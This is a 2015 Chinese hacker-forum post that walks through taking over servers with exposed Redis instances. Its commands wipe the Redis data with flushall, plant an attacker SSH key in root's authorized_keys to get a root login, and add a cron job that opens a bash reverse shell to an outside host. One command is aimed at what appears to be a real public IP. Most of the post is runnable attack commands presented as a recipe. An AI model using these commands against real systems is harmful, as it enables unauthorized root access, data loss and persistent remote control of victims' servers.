搜索
查看: 806|回复: 1

redis配置不当可导致服务器被控制

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-11-13 11:20:03 | 显示全部楼层 |阅读模式

服务器配置不当包括三个部分:
1.Redis服务使用ROOT账号启动
2.Redis服务无密码认证或者使用的是弱口令进行认证
3.服务器开放了SSH服务,而且允许使用密钥登录

简单的写下过程

  1. ###测试环境
  2. ```
  3. victim server CentOS6.6+redis2.4  192.168.192.133

  4. attack server CentOS6.6  192.168.192.132

  5. ```

  6. 先在attack server生成一个公钥
  7. ```
  8. ssh-keygen -t rsa -C "redis"
  9. (echo -e "\n\n"; cat redis.pub; echo -e "\n\n") > redis.txt
  10. ```
  11. 然后执行
  12. ```
  13. redis-cli -h 192.168.192.133 flushall

  14. cat redis.txt | redis-cli -h 192.168.192.133 -x set pwn

  15. ```
  16. 登录redis并修改其配置  redis-cli -h 192.168.192.133
  17. ```
  18. CONFIG set dir /root/.ssh/
  19. config set dbfilename "authorized_keys"
  20. save
  21. exit
  22. ```
  23. 然后就可以使用ssh的公钥登录了
  24. ```
  25. ssh -i redis root@192.168.192.133
  26. ```
复制代码
也可以创建计划任务:
  1. echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -h 115.182.69.199 -p 3000 -x set 0

  2. config set dir /var/spool/cron/

  3. config set dbfilename root
复制代码



过段时间可能会取消签到功能了

0

主题

0

帖子

30

积分

我是新手

Rank: 1

积分
30
发表于 2015-11-15 20:32:05 | 显示全部楼层
有的地方错了,改改吧。
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表